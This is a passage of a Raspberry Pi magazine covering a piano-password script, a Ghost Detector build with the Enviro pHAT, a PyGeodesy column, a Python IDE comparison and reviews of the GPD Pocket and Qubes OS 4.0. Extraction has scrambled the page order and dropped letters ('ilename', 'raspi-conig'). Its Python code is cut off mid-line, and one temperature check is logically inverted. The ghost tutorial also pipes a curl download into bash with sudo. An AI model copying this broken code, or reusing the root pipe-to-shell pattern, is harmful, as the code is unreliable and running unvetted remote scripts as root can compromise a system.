button. If the password is incorrect, you’ll see a message
to that effect and the script will exit.
If the password is correct, the script will display the
message ‘Password is Correct’ and inform you it’s in the
process of decoding your text. The decrypted message
itself will appear below.
While the decrypted text is displayed here in the
Terminal, you cannot alter it. If you want to do so, run the script again.
time. Consider expanding on this basic script to allow you
to specify a filename when encoding your secrets.
Python makes this easy programatically through use
of the input command; for instance, insert the following
into the encode_text procedure in
ilename= input('Enter ilename: ')
Make sure to amend the open file command as follows:
c= open(ilename,"w+")
Don’t forget to mirror any changes you make in the script to the script.
Changing tones
Sharp-eyed readers will have noticed that in
modifying the ‘Instrument’ button to enter passwords,
you can now no longer choose between drum beats and
piano tones. If you are more at home with a hi-hat than a
high A, you can switch to using drum sounds quite easily.
Open Terminal on your Pi and copy the drums
directory from the Pimoroni examples folder into the
pianohat-password folder:
cp -r /home/pi/Pimoroni/pianohat/examples/
sounds/drums /home/pi/pianohat-password/sounds
Make sure to move the piano folder outside the sounds
folder too, e.g. by moving it to the trash. This ensures
there’s only one instrument for the script to choose.
Add to your scripts
The piano password scripts are functional but as
it stands, they can only be used to encode one secret at a
Playing passwords
If you haven’t played piano before, Pimoroni has put together
an excellent tutorial for you. Open a Terminal and run:
sudo python Pimoroni/pianohat/examples/
Each of the keys on the Piano HAT has a built-in LED. Simply
press the keys that light up to play a simple melody (in this
case Twinkle, Twinkle, Little Star). The tutorial has the added
advantage that if you accidentally press any other keys
besides the one that is lit, no sound will play.
Once you feel comfortable with the basics, if you want to
choose some random notes for your musical password, visit Use the ‘Options’ button
to increase the number of notes (up to 7).
To generate a longer set of notes, visit
integer-sets. This will allow you to generate a set of unique
integers. You can use the same numbering system (1-60) as
outlined in the scripts for notes, or make up your own.
Ghost Detector
A Pi owner's guide to ghosts
and how to catch them
Dan Aldred
is a Raspberry Pi
enthusiast, teacher
and coder who
has temporarily
diversified into
ghost bustin'
(because it makes
him feel good).
Deploy the Pi, Enviro pHAT and an infrared camera to capture
evidence of anything up to a Class 5 Full-Roaming Vapor
Raspberry Pi
Enviro pHAT
Black Hat Hack3r
Tutorial files
As a child, your author distinctly remembers learning
that if a ghost or spectre is present, there are several
environmental changes that can occur. First, the room
may feel colder due to a sudden drop in temperature.
Second, objects may mysteriously move by themselves
to a new location. Third, you may observe a strange
coloured light or a bright white light close to where the
supernatural entity is.
Pimoroni’s Enviro pHAT is the perfect hardware suite
to catch ghosts. It packs four different sensors, letting
you measure temperature, pressure, light level, colour,
3-axis motion, compass heading and analogue inputs.
They state that “It’s ideal for monitoring conditions in
your house, garage or galleon. Set up a web server with
Flask and remotely monitor everything from anywhere.”
What they failed to mention is that you can also use it to
catch ghosts.
Use the BMP280 temperature/pressure sensor to
measure a drop in temperature, the TCS3472 light and
RGB colour sensor to pick up any changes in light, and
then the LSM303D accelerometer/magnetometer sensor
for movement – that book being flown across the room or
the table rocking or a door opening all on its own.
Combine the Enviro pHAT With the Pi Camera
Module and an infrared (IR) LED ring and you have the
perfect setup to capture photographic evidence of your
supernatural visitors.
Install the required software
Begin by setting up your Raspberry Pi and
installing the required software libraries. Open up a
Terminal window and update and upgrade the OS, lines
one and two. Then install the Enviro pHAT library from
Pimoroni by typing the command on line three. This will
download and install the required software and several
example programs. To make use of an audio warning,
install the MP3 library, mpg321, line four. Shut down your
Pi typing the command sudo shutdown, then unplug the
power supply.
sudo apt-get update
sudo apt-get upgrade
sudo curl -sS
envirophat | bash
sudo apt-get install mpg321
raspi‑conig and select the required setting. Reboot
your Raspberry Pi.
Wire up the LISIPAROI
Test the camera
The LISIPAROI requires only four wires. Attach
the power wire, the one on the far right, to the 5V pin
(physical pin 2). The two middle pins are used for the
ground / GND connections. Any two of these physical
board pins can be used: 6, 9, 14, 20, 25, 30, 34 and 39.
The last connection on the left is the GPIO pin, which in
this tutorial uses GPIO 10 (physical pin 19). Attach the
required wires (refer to Fig 1).
Set up the hardware
Next, we need to connect the hardware. It is
recommended that you use the Mini Black Hat Hack3r,
although the pinout website
provides a wiring diagram which means you don’t
have to. Attach the Pi Camera Module with the blue
strip pointing away from the HDMI port. Next, attach the
Create a small program to test that the Pi
Camera is connected, enabled and working correctly.
Open your Python editor and copy out the program below.
This will start a camera preview which you can view on
your monitor. Then the camera will take a picture and
save it onto your Pi desktop. If it does not work, check
that the camera is connected correctly, that it is enabled
in the Pi settings and that the code is correct.
from picamera import PiCamera
from time import sleep
camera = PiCamera()
Black HAT Hack3r and place the Enviro pHAT onto the
pins. This then provides additional pins for the wiring of
the LISIPAROI IR LED ring. Last, enable the Pi Camera in
the OS settings: open the Terminal window, type sudo
Import the modules
Now to create full program. Begin this step by
opening a new, blank Python file; this will hold the main
program for the Ghost Detector. Import the required
modules – system and OS – to write the image files back
to a folder. On line four, import the Pi Camera functions
and line five, the GPIO software. On the last line, import
the main Enviro pHAT features: light, weather (for the
temperature) and motion.
Fig 1 Wire up the
LISIPAROI to 5V power
and ground pins, and
Ghost Detector
#variables for the motion sensing#
threshold = 0.2
readings = []
last_z = 0
import sys
import os
import time
from picamera import PiCamera
import RPi.GPIO as GPIO
from envirophat import light, weather,
motion, leds, analog
camera = PiCamera()
Set values for the motion sensor
Set the GPIO pin numbering system to BCM;
this option means that you are referencing the pins by
the ‘Broadcom SoC channel’ number, line one. These are
the standard numbers after the ‘GPIO’ label, instead of
the physical pin number. Set GPIO 10 as the output, line
two; this is used as a trigger for the IR LEDs. Next, create
three variables to hold the required values for the motion
sensor. The first value refers to the amount of movement
to detect, the second is a list to hold the gathered
sensor readings, and the third is the last position of the
measurement on the z axis.
GPIO.setup(10, GPIO.OUT)
Save images and take a sensor reading
If you are lucky enough to encounter a spectre
then you will have photographic evidence. This file
is named and saved as a picture number. Create a
global variable to store the picture number, line one. If
you capture more than one image, you do not want to
overwrite the previous one. Set the initial image value at
0, line two.
global ile_name
ile_name = "0"
Create a camera function – part 1
The main program works by checking a reading
from a sensor and if it falls within a range of values then
it triggers a function which controls the camera. Begin
by naming the function, line one. Then add the global
filename, line two; this means you can increment the
filename each time a new image is taken. One line three,
set the GPIO 10 to HIGH. This creates a circuit on pin
10 and sends power to the IR LEDs, turning them on,
resulting in the camera being able to take an image in
the dark.
def catch_a_ghost():
global ile_name
GPIO.output(10, GPIO.HIGH)
print (ile_name)
Create a camera function – part 2
Complete the function by triggering the camera
and setting the name of the image file, line one.
Then turn off the infrared LEDs by setting GPIO 10 to
LOW, line three. To avoid overwriting the image file,
increment the filename by one using the code ile_name
= int(ile_name) + int(1). The int converts the
value to an integer, so that it can be added to. However,
filenames are not integers, so you must convert the name
camera.capture(ile_name + ".jpg")
GPIO.output(10, GPIO.LOW)
ile_name = int(ile_name) + int(1)
ile_name = str(ile_name)
os.system('mpg321 /home/pi/wegotone.mp3 @')
Establish the current room temperature
To discover if a ghost is present, you can check
for a sudden change in temperature. First, we record the
starting room temperature, with weather.temperature(),
storing this into a variable, line one. Next, create a loop,
line five, which will continually check for changes. On
line six, create a new variable called current_temp and
take another new reading. This value can then be used
and compared with the start temperature in Step 14, to
calculate if there is a significant shift in temperature.
start_temp = weather.temperature()
print ("The room is ", start_temp)
while True:
current_temp = weather.temperature()
print ("Current Temperature is",
back into a string, line five. The final line triggers an
optional audio alarm informing you that the camera has
taken a picture. You may want to leave this line out if your
setup is in a remote haunted house or, if you feel tempted
to check the image straight away and you don’t want to
risk running into the ghost. It might be best to wait until
the morning.
What is cron?
Cron is used as a time-based job scheduler that permits
you to schedule jobs (commands or shell scripts) to run
periodically at certain times or dates. It is commonly
employed to automate system maintenance programs such
as disk or administration tasks.
Ghost Detector
Sensing motion
Next, set up the code to record and respond to
movement. Begin by taking a reading from the motion
sensor and appending the value to the list you created in
Step 6, readings = []. On line two, update the list with
the readings. Then use a calculation, line three, to add
together all the readings and divide by the total number
of readings in the list. This calculates an average value
and is used to compare if there is a change in the z axis. A
change indicates movement.
readings = readings[-4:]
z = sum(readings) / len(readings)
Sensing light
If a ghost or spectre appears then it may emit
additional light or even a strange glow. Use the Enviro
pHAT’s light sensor to measure this reading. Create a
variable to store the value, line one, and collect the red,
green and blue (RGB) values, line two. On lines three and
four, print out these values; this is useful in determining
the strength and colour of the light.
amount_of_light = light.light()
r, g, b = light.rgb()
print("Amount of light", amount_of_
print ("Colour", r, g, b)
Responding to movement
Now to check for movement which could be
triggered by the Halloween monster knocking into the
pHAT. If it is a ghost, then it will just pass through, but the
light sensor will be triggered instead. Begin by comparing
the last z position with the new z position and threshold
value, line one. This always checks if there is movement
from the ‘current position’ and responds even if the pHAT
is moved several times. If movement is detected then
trigger the Camera using the function catch_a_ghost(),
which you created in Step 8.
"""Check for motion or movement"""
if last_z > 0 and abs(z-last_z) >
print("Motion Detected!!!")
last_z = z
Responding to a temperature change
In Step 10 you wrote the code to take a
temperature reading and store the value in a variable.
Compare this value with the current temperature, line
one. Remember, if a ghost is present then there should
be a sudden drop in temperature. If the temperature
drops by less than 5 degrees in a second then you may
have a ghost present. Trigger the camera, line three, then
set the start temperature to the new temperature value.
This will accommodate a gradual drop in temperature
during the night.
"""Check for a change in temperature"""
if current_temp - start_temp < 5:
print ("GHOST")
start_temp = current_temp
Responding to light
The last section of the program is similar to the
previous two steps. Check for a change in the amount of
except KeyboardInterrupt:
Auto-start the program
You may want to deploy your ghost catcher in a
location where you can’t use a monitor. This requires the
program to start automatically when you plug the power
in. Open the Terminal and type sudo crontab -e to open
crontab, a daemon where you can list programs to run or
execute at specific times. Scroll to the bottom of the list
and enter the @reboot command followed by the folder
location and filename of your ghost catcher program:
@reboot sudo python /home/pi/
The ‘&’ at the end of the command will run the code in the
background and your Raspberry Pi will boot up as normal.
Save and exit; now your program will run at bootup.
Happy ghost busting!
light which you collected in step 12 and then compare
it to a present value. A value of zero indicates that
there is no light. In this program, on line one, check for
a value greater than two and then trigger the camera,
line three. The value can be adjusted to complement the
environment; for example, if there is a lot of light from
street lamps then set the value higher.
if amount_of_light > 2:
print ("GHOST")
GPIO pin numbering
GPIO pins are a physical interface between the Pi and the
outside world. At the simplest level, you can think of them as
switches that you can turn on or off. You can also program
your Raspberry Pi to turn them on or off (output). The
GPIO.BCM option means that you are referring to the pins by
the ‘Broadcom SoC channel’ number. The GPIO.BOARD option
specifies that you are referring to the pins by their physical
pin number.
Pythonista’s Razor
Carry out portable geodesy
With the availability of Raspberry Pis, you can now do fairly
complex geodesy calculations live in the field
he Raspberry Pi platform
allows for projects
where you can bring a
computer with you
when you go out into the field to do
research. One of these research
areas is geodesy (and geomatics),
which is the branch of applied
mathematics that’s concerned with
measuring and understanding the
Earth’s geometric shape. As you may
have suspected, doing threedimensional mathematics on a
curved surface can be a tad messy.
Hence the need to have some robust
computing handy. The traditional
way to do field work is to go out and
collect measurements, then go back
to the office. This month, we’ll look at
a Python module called PyGeodesy
Joey Bernard
is a true Renaissance
man. He splits his
time between building
furniture, helping
researchers with
scientific computing
problems and writing
Android apps.
It’s the official
language of the
Raspberry Pi.
Read the docs at
import pygeodesy
latlon1 = pygeodesy.
LatLon(49.66618, 3.45063)
utm1 = pygeodesy.utm.
This uses the usual ellipsoidal
mathematics to make the
calculations. There is also another
set of equations, developed by
"Doing 3D mathematics on a
curved surface can be messy"
which can be used to handle these
types of calculations. This isn’t
available in the regular package
repos, so you will need to install it
with sudo pip install pygeodesy.
One of the first things you may
want to do is to convert data
between different coordinate
systems. There are separate objects
that can be used to store data
points within a particular coordinate
system. For example, you can use
Universal Transverse Mercator (UTM)
coordinates within your program and
create an appropriate object with:
import pygeodesy
utm1 = pygeodesy.utm.
parseUTM('31 N 448251 5411932')
You can enter the data point as
a string made up of the zone,
hemisphere, easting and northing.
The UTM object has properties
which allow you pull out each of
the individual elements, such as
the easting, the northing or the
hemisphere. If, instead of a UTM
string, you have a set of latitude and
longitude values, you can create a
LatLon object and use that to create
your UTM object. The following gives
an example of how you could do this:
Thaddeus Vincenty in 1975, that
can also be used to manage points
defined by latitude and longitude.
The advantage to this alternative is
that you can give it an Earth model
to define the coordinate system by,
rather than accepting the default
ellipsoidal model. Once you have a
UTM object, it has helper methods
to convert it to other supported
coordinate systems. The following
code gives a couple of examples:
# Convert to an ellipsoidal
geodetic point
latlon2 = utm1.
# Convert to an MGRS grid
mgrs1 = utm1.toMgrs()
The first example enables you to
convert back to a set of latitude and
longitude values, but you need to
provide which type of Earth model
you wish to use by including the
class of the type you are interested
in. The second example converts
the point to a NATO Military Grid
Reference System (MGRS) grid point.
Now you have the ability to enter
points, what can you do with them?
One interesting problem is finding
the central point given a series of
geographical points on the globe.
Again, you’d need to choose which
ellipsoidal model that you wanted to
use to do the calculations with. Using
the defaults, you could do this:
import pygeodesy.
ellipsoidalNvector as penv
mean_point = penv.
The variable point_list is a
list made up of LatLon objects
representing each point of interest.
You also need to include what kind
of ellipsoidal model is being used
with the LatLon input parameter.
Another task you may have with a
series of points is to define a path
along the surface of the Earth.
Very often, you’ll need to take
measurements defining these points
and simplify the path. PyGeodesy
provides several simplification
routines, of varied computational
times, that provide different levels
of simplification. Below is a basic
simplification routine:
import pygeodesy.simplify as
simpliied_path = psimp.
simplify1(latlon_list, dist)
The first input parameter is the
original list of points, given as a list
of LatLon objects. The second input
parameter is a tolerance distance.
Any line segments below this
threshold get removed, and the list
Python column
What if you need
to do more?
of simplified LatLon points is returned.
This is probably the fastest, and most
inaccurate, simplification routine.
Luckily, there are six other routines
available, e.g. the code below uses the
Reumann-Witkam algorithm:
simpliied_path = psimp.
simplifyRW(latlon_list, pipe)
The first parameter is the original list
of points to be simplified. The second
parameter is the radius, in metres, of
an imaginary pipe. This pipe is passed
over the points in the original path, and
all of the points lying within the pipe
get simplified to a single line, up to the
first point that lies outside the bounds
of the pipe. An even more complex
algorithm is the Visvalingam-Whyatt
(VW) method of simplifying a path. This
method creates triangles out of nearby
points and tries to remove any external
points if the triangle made is below
some threshold. For example:
simpliied_path = psimp.
simplifyVW(latlon_list, area)
The second parameter provides the
threshold area of the triangle, given in
square metres.
Until now, we have looked at the
ellipsoidal sub-modules, which
model the Earth as some form of
an ellipsoidal. There are also two
sub-modules which model the Earth
as a sphere: sphericalTrigonometry
and sphericalNvector. Both of these
sub-modules have their own versions
of the LatLon class, and a whole set of
module functions. The trigonometric
version creates a new LatLon object,
achieved by simply giving the values
for the latitude and longitude. The
newly created object has several
instance methods available. Below are
a few examples:
import pygeodesy.
sphericalTrigonometry as ptrig
latlon1 = ptrig.LatLon(45.00,
# Calculate a destination
latlon2 = latlon1.
destination(dist, bearing)
# Calculate the midpoint
midpoint = latlon1.
intermediateTo(latlon2, 0.5)
The first example takes a given point
and, using a given distance and
bearing, calculates what the resulting
point would be. The second example
takes two points and returns the point
that is some ratio between the two
ends. In this example, we are looking
at a point halfway between the two
ends. Instead of defining single points
or lines, you can also define a polygon
by creating a list of LatLon objects. You
can find the area of such a polygon,
bounded by the great circles defined
by these points, with area = ptrig.
areaOf(latlon.list). This area is
given in square metres. You may want
to know whether one of the poles is
enclosed by this polygon that you have
constructed. You could find out with:
if ptrig.
print('There is a pole
If there is no pole enclosed, you may
be interested in finding the geometric
mean of this polygon with mean_point
= ptrig.meanOf(latlon_list). All
of these are also available within the
Nvector version, as well. This version
uses N-vectors to define points and
do the calculations. These underlying
calculations are much easier to do
and understand, rather than the
trigonometric versions.
We’ve not mentioned other methods
that can be used, such as trilaterate,
but as you can see, there’s lots of
portable computing power that you
can bring to bear.
While PyGeodesy provides a lot of core
functionality, people doing research will always
need to do something new. Many of the underlying
calculations are done using NumPy. You can tap
into these underlying structures directly to add
your own algorithms. You may have some complex
calculation that gives you a NumPy array made
up of sets of latitude and longitude points. For
example, you might have a GPS unit feeding in data
over a USB which is then massaged through some
form of correction algorithm. You will likely want to
make these calculations through NumPy. Once they
are done, you can wrap them with a Numpy2LatLon
class to hand them in to the PyGeodesy module.
As an example, say you had a NumPy array that
contains the bounding points of a polygon. You
could calculate the area with the following code:
import pygeodesy.points as pp
import pygeodesy.sphericalNvector as psnv
area = psnv.areaOf(pp.Numpy2LatLon(point_
You may need to run in the other direction, taking
a list of LatLon objects and using them as if they
were a list of latitude and longitude values. There is
a wrapper class that helps out here. The following
example takes a list of points and counts how many
time some given point appears in the list:
point_list = pp.LatLon2psxy(latlon_list)
count = point_list.count((x, y))
In the above, x and y define a tuple. If the searched
for point doesn’t exist within the given list, the
count method throws an error. If you want to check
first, you can use the ind() method to locate
the first instance of the xy point, or the indall()
method to get a list of all of the instances in the list.
The rind() method will give you the last instance
of the searched for point. Along with the ability
to go back and forth between PyGeodesy LatLon
objects and NumPy arrays, there are a number of
helper functions available within the PyGeodesy
module. For example, the following code gives you
the dot product of three vectors:
dot_prod = pygeodesy.fdot3(a, b, c)
You should have enough core utilities to be able to
add in your own functionality when needed.
81 Group test | 86 Hardware | 88 Distro | 90 Free software
PyCharm Community Edition
Python IDEs
Take your Python programming setup to the next level and write masterful code
with ease using these dedicated Python code editors
PyCharm CE
This cross-platform IDE is written
in Python itself and supports
both Python 2 and Python 3
as well as the Qt5 and Qt4
application frameworks. Eric
bundles all the tools you need to
develop and manage a software
project, making it a strong
contender for the top spot.
The PyCharm editor is available in
two different editions. We will be
taking a look at the open-sourced
community edition. Although it
doesn’t offer the same number of
features as its proprietary sibling,
the Apache 2-licensed version
has a built-in debugger and
version control.
While it began life as a thirdparty plug-in for the Eclipse
IDE, the developers recommend
using PyDev through the LiClipse
lightweight editor. Besides pure
Python, you can use PyDev to
write code in CPython, Jython
and IronPython, which also offers
several other conveniences.
The editor that’s now the official
Python IDE on the Raspbian
distro for the Raspberry Pi is
designed keeping in mind the
needs of beginners. It looks plain
and uninspiring compared to the
other candidates, but bundles
all the features you need to write
Python more efficiently.
Python IDEs
PyCharm CE
Brimming with features but needs
the benefit of a better interface
A professional code editor that does
it all, but at the cost of usability
n The IDE’s developmental toolset includes a UI browser, an icon editor
and even a fully fledged web browser
n PyCharm boasts support for scientific Python libraries including
Anaconda, NumPy and Matplotlib
Coding essentials
Coding essentials
If there’s one thing you can be sure of in Eric, it’s that it bundles all
the coding conveniences you’d expect from an IDE. Its debugger can
debug multithreaded apps, while the interactive shell has syntax
highlighting and autocompletion. It also includes code checkers that
weed out style and syntax errors.
PyCharm IDE includes all the coding conveniences you would expect
from a mature IDE. It’s got a fully functional debugger, and the editor
helps you complete, auto-indent and format code, and can highlight
errors on-the-fly. It also bundles several options to easily navigate
complex coding projects.
Eric integrates Qt Designer and other components that help you
create and preview Qt-based graphical user interfaces. It also
offers integrated version control for Mercurial, Subversion and
Git. The IDE can be used to manage complex coding projects and
allows for collaborative editing. Eric also bundles the rope Python
refactoring library.
Another area of excellence. PyCharm includes very useful code
refactoring options that’ll scan the code and offer suggestions
and reminders in real time. The IDE also offers unified support for
several version control systems including Git, Subversion, SVN and
Mercurial. However, unlike Eric, PyCharm doesn’t offer the same kind
of assistance to create graphical interfaces.
You can expand the IDE’s core features by adding new functionality
using the IDE’s very elaborate plug-ins mechanism. A default
installation uses about 20 plug-ins and you can install over 40 more
from its repository. The plug-ins range from simple GUIs for the pip
command to adding support for creating Django projects.
The Community Edition build of PyCharm has over 800 plug-ins,
arranged in categories such as admin tools, graphics and unit testing.
You can access and install them either from within the IDE or from
the editor’s website. However, the plug-ins are in various stages of
development and some might not even work on Python projects.
The main window of the application is fairly cluttered, featuring
several different horizontal and vertical panels. While they’ll surely
help experienced users get a better view of their comprehensive
coding project, it’ll also undoubtedly end up overwhelming new users.
The IDE lets you edit the interface, but using the editor will still feel
like overkill for most coders.
Since PyCharm is designed for managing complex coding projects,
its interface – much like Eric’s – is very noisy. That said, while it might
still intimidate a new user, PyCharm’s UI is somewhat more intuitive
than Eric’s, probably because of the less numerous and better
labelled menus and windows. You’ll still have to leaf through its docs
to use it productively.
The unending list of assistive tools and functions
will surely attract coders working on complex
Python projects. And just as surely, its cluttered
interface will end up driving away first-timers.
Another IDE for organising and working on complex
coding projects that’s easier on the eyes compared
to the previous one, but still overkill for a vast
number of amateur Python coders.
Caught between being an open
source plug-in and a proprietary IDE
An approachable and feature-rich
IDE that has a sparse appearance
n You can use PyDev either by plugging it into Eclipse or via its
standalone crowdsourced LiClipse IDE
n Thonny stands out from the others with its smattering of buttons and a
mere handful of menus, but plug-ins are on hand if you need them.
Coding essentials
Coding essentials
Just because PyDev ships as a plug-in, don’t assume it’s short on
features. You’ll get all the usual IDE conveniences with PyDev that
you get with the other standalone editors such as syntax highlighting,
code completion/folding and more. On top of it, PyDev includes a
remote debugging server to debug remote programs as well.
It has pretty much everything a beginner would need. Code
completion works well and syntax highlighting is good. Its debugging
mode is pretty special and steps through the code so you can look into
how expressions are evaluated. Function calls are displayed within a
new window, with a separate local variables table and code pointer.
Similarly, PyDev bundles code analysis features as well to help avoid
inadvertent errors in your programs. PyDev also includes functional
code refactoring that enables you to quickly fold code into custom
methods. With PyDev you also get wizards to create Google App
Engine and Django projects. Also integrated is the PyLint code
quality checker.
Because of its goal, don’t expect the same conveniences from Thonny
as with other IDEs. Thonny can highlight variable occurrences to help
users avoid typos and also distinguishes local variables from global
ones. When you write object-oriented code, you can select objects in
the Heap or Variables window and use the Object Inspector to check
their type and attributes.
Since it is distributed as a plug-in to the venerable (and monstrous)
Eclipse IDE, you can take advantage of Eclipse’s marketplace to add
new features. Support for version control systems like Subversion
can be added via plug-ins. However, many plug-ins will only offer
conveniences for Eclipse’s primary programming language, Java.
According to its developer, Thonny has a simple infrastructure for
fleshing the editor with plug-ins. Currently there’s also one plug-in
that adds support for BBC micro:bit to the IDE. Thonny also has a
graphical interface to Python’s pip package manager that enables you
to install additional Python packages and libraries.
Setting up PyDev requires more effort than the other IDEs, since it
involves installing the Eclipse editor. The PyDev interface is bolted
onto Eclipse’s multi-window interface which is chock-full of icons.
Unless you are already used to working with Eclipse, getting to grips
with its interface doesn’t offer the same returns as with the other
IDEs here.
This is one area where Thonny trumps the rest. It’s very easy to install
and there’s absolutely no learning curve involved in using the IDE.
You can fire up Thonny and start punching out code, irrespective
of your skill level. The IDE has a simple menu structure with limited
options and you can add new views to the interface in line with your
experience and the requirements of your code.
Despite being available as a plug-in, PyDev can
stand up to the other standalone editors in this
group test. However, all things considered, it’ll only
be useful to people who already work with Eclipse.
By far one of the most approachable IDEs that will
help you hone your Python skills. Its set of features
is aligned with its goal of tutoring Python learners
and its debugger deserves a mention.
Python IDEs
In brief: compare and contrast our verdicts
Bundles all the
coding functions you
will ever need and
then some.
Includes features
to help create GUI
elements and manage
large projects.
Offers a neatly
categorised list of over
40 plug-ins to flesh out
the IDE.
The weakest point of
the editor, which will
force users to skim
through the docs.
A future-proof IDE
that will work for the
widest range of users
– but it’s not pretty.
PyCharm CE
The IDE is brimming
with helpful features
that will help you to
code productively.
Just falls short of
Eric in terms of the
conveniences that it
offers to coders.
The CE version offers
over 800 plug-ins, though
some might not work
with Python.
Has a slightly better
user interface than
Eric, but still has
its peculiarities.
A sophisticated IDE with
a busy interface that will
take some getting used to
for most users.
Ships as a plug-in to
Eclipse, but it’s still got
nearly every trick in
the book.
Bundles code
analysis features
and wizards to create
Django projects.
As a plug-in to one of
the most popular IDEs,
Eclipse, it has no dearth
of plug-ins.
Setting up requires
more effort than the
rest and its UI isn’t
very intuitive.
As a plug-in to Eclipse,
PyDev actually makes
a lot more sense for
existing Eclipse users.
Has all the features
that will help new
users get to grips
with Python.
Doesn’t offer the same
general-purpose coding
assists as the other
IDEs here.
Currently offers
just one plug-in, but
bundles a GUI for the
pip package manager.
In stark contrast to
the others, Thonny
makes it very easy to
begin coding.
A cleverly designed IDE
that will help nurture
the skills of newcomers
to Python.
You might be surprised by our choice,
especially considering Eric’s rather busy
and unintuitive interface. But unlike some
of the other classes of software, we prefer
our IDE to offer us more features instead of
being aesthetically pleasing. A code editor
is a specialised piece of software and you
can’t avoid flipping through its manual to
get the most out of it. All editors apart from
Thonny require you to spend some time with
the documentation to master their respective
nuances. Eric tops the rest because it’ll
expose functionality that will cater to a large
number of users.
Thonny rules itself out because of its
limited focus. Hands down it’s the best IDE
for anyone who’s new to Python. It’s got the
right number of features that are exposed
through just enough of a user interface so
as to not overwhelm new users. That said,
despite its flexibility, it’ll be of limited use
for someone who codes for a living. PyDev
takes itself out of contention as it requires
too much work to set up. Furthermore, for
someone not familiar or comfortable with
Eclipse, PyDev just doesn’t offer the same
n Eric includes a very detailed Preferences dialog that enables you to customise various aspects of the IDE
return of investment that you get with the
other code editors.
That leaves us with PyCharm and Eric.
While PyCharm has the more intuitive
interface of the two, you can’t use either
productively without reading through the
documentation. However, once you’ve
spent some time orienting yourself, you’ll
find Eric to be a more encompassing IDE
than PyCharm, or any of the others for that
matter. This is especially true for creating
graphical interfaces, which is a walk in the
park with Eric. You’ll also be able to use the
IDE to work collaboratively on projects and
code more efficiently.
Mayank Sharma
The source for tech buying advice
GPD Pocket
Above A fan vent sits alongside
the expansion ports for the copper
heat-pipe cooling system
GPD Pocket
CPU: Intel Atom x7-Z8750 1.6GHz
Display: 7-inch 1920×1200 IPS
Graphics: Intel HD 405
Storage: 128GB eMMC
Ports: USB C, USB A 3.0, Micro HDMI,
3.5mm headphone jack
Connectivity: 2.4GHz/5GHz 802.11ac
2×2 MIMO Wi-Fi, Bluetooth 4.0
Battery: 7000mAh with USB-PD
charging support
Weight: 480g (magnesium alloy
Size: 80×106×18.5mm
The UMPC (ultra-mobile PC) is back in the form of the
small yet perfectly formed GPD Pocket
Around ten years ago, the computing world was
obsessed with the idea of ultra-mobile PCs
(UMPCs). Although there were some impressive
devices for the time (the Sony Vaio and Toshiba
Libretto, for example), the reality was that
the technology wasn’t available to make the
machines viable for most users. The small
screens were low resolution and low quality,
processors were power hungry and ran hot and,
most importantly, battery technology meant an
hour or two of runtime at best. Now technology has
moved on and it’s much more feasible to create
tiny PCs, we don’t tend to see them – smartphones
and tablet PCs more commonly fulfil that need.
A relatively unknown Chinese company is looking
to change that, with the GPD Pocket mini PC –
complete with Ubuntu support.
The GPD Pocket was initially launched on
crowdfunding site Indiegogo. The campaign not only
hit 1,516% of its target with $3.5m raised, the firm
in question – GPD – was also able to build upon
previous experience building these types of devices
to bring the Pocket to fruition (its previous product,
the GPD Win, was a popular 5.5-inch Windowsbased gaming machine).
Before we dive into the details, it’s important
to understand that devices of this type are about
compromises. It’s not possible to cram a top-end
Left The silver finish
could easily be mistaken
for that of an Apple product. Fit
and finish is excellent too
The balance between capability and efficiency is
spot on – battery life is seven hours in reality, which is
extremely impressive
desktop PC into a tiny chassis, but the key to making
a successful product is compromising in the right
places so as to provide a good overall experience –
so has GPD made the right calls?
At the heart of the Pocket sits the Intel Atom
x7-Z8750 processor with HD405 graphics. While
your immediate reaction may be to baulk at the
mention of an Atom processor, it’s worth nothing
that the Z8750 is a quad-core, 64-bit CPU from
the Cherry Trail family, built on the 14nm process
with a standard 1.6GHz clock speed and burstable
2.56GHz max. Backed by 2MB of on-board cache,
the processor proves impressively capable,
particularly for a 2W part. Performance is also
helped by 8GB of LPDDR3-1600 memory and 128GB
of storage (albeit eMMC rather than SSD). The
balance between capability and efficiency is spot
on – although claimed battery life is 12 hours, this
is more like seven hours in reality, which is still
extremely impressive. The GPD Pocket display is also
a particular highlight. The 7-inch 1,920×1,200 16:10
screen packs 323 pixels per inch and is impressively
sharp with responsive multi-touch. The top and
bottom bezels are tiny, while the side bezels are
larger to facilitate space for the keyboard. Unusually,
the Pocket doesn’t include any sort of camera at all,
so video calls are out of the question.
Selecting the right hardware might be the simple
part of the equation when compared to getting the
keyboard right. There’s simply no avoiding the fact
that there’s not a lot of space for a full keyboard and
so input on the Pocket will take some getting used
to. The layout is somewhat shifted to the left, some
of the key sizes are a little unusual and of course
things are more cramped than on a conventional
QWERTY. Crucially though, the keys have plenty
of travel and are responsive – after a few hours of
typing, you’ll be surprised how good the machine is
to use. The keys are far superior in feel to devices
such as Apple’s MacBook for example.
A healthy array of ports provide excellent
connectivity – charging is via the USB C port and
USB A is still present. A good old-fashioned 3.5mm
headphone port is included, as is a micro HDMI
port allowing you to use the Pocket to power a
larger screen.
GPD initially shipped the Pocket with Windows 10
Home before making an Ubuntu 16.04 image
available. The factory image works fine, but the best
aspect of the machine is the excellent communitybased support (primarily via /r/gpdpocket on Reddit)
that has already sprung to life. Images to install
multiple versions of Linux are available, with full
hardware support and improved performance over
stock. A vibrant discussion around software and
hardware tweaks serves to make the Pocket an even
better enthusiast’s machine than it already is.
Paul O’Brien
Surprisingly good performance
and a healthy spec sheet
complemented by a beautiful
screen, exceptional build
quality and generous ports.
The keyboard takes some
getting used to and the cooling
fan can be aggressive; and
it’s quite expensive.
The GPD Pocket is a
compromise – this type
of product always will
be – but it’s done well.
As a full PC experience
you can fit in your jacket
pocket, nothing else
really comes close.
Windows on ARM will
drive new devices in
this form factor, though,
so the market is
set to explode in
the near future.
Qubes OS 4.0 RC1
Above You’ll have to manually
earmark apps to AppVMs as it only
has a handful set by default
Qubes OS 4.0 RC1
Edward Snowden’s favourite distribution get a
comprehensive update
32GB disk space
64-bit Intel or AMD processor
Available from:
In the six years of its existence, Qubes OS has
established itself as arguably the most popular
security-centric distribution. The reason is that
the distro is unique in its approach of isolating
the several essential elements that constitute an
operating system inside different virtual machines.
Essentially, this compartmentalisation helps contain
the fallout in the event of security breach.
The developers have recently unveiled the first
release candidate of Qubes OS v4.0, which has been
under development for over a year now. A majority
of the changes in this release are behind the scenes,
many of which also manifest themselves in terms
of changes to how users interact with the distro.
The early years of Qubes OS were spent adding
features and functionality that invariably led to the
code getting increasingly complex and messy. One
of the essential talking points of this release is the
rewritten back-end, which is more modular and
extensible. Two enhancements that the developers
credit to this code cleanup are the improved firewall
interface that allows more rules and doesn’t
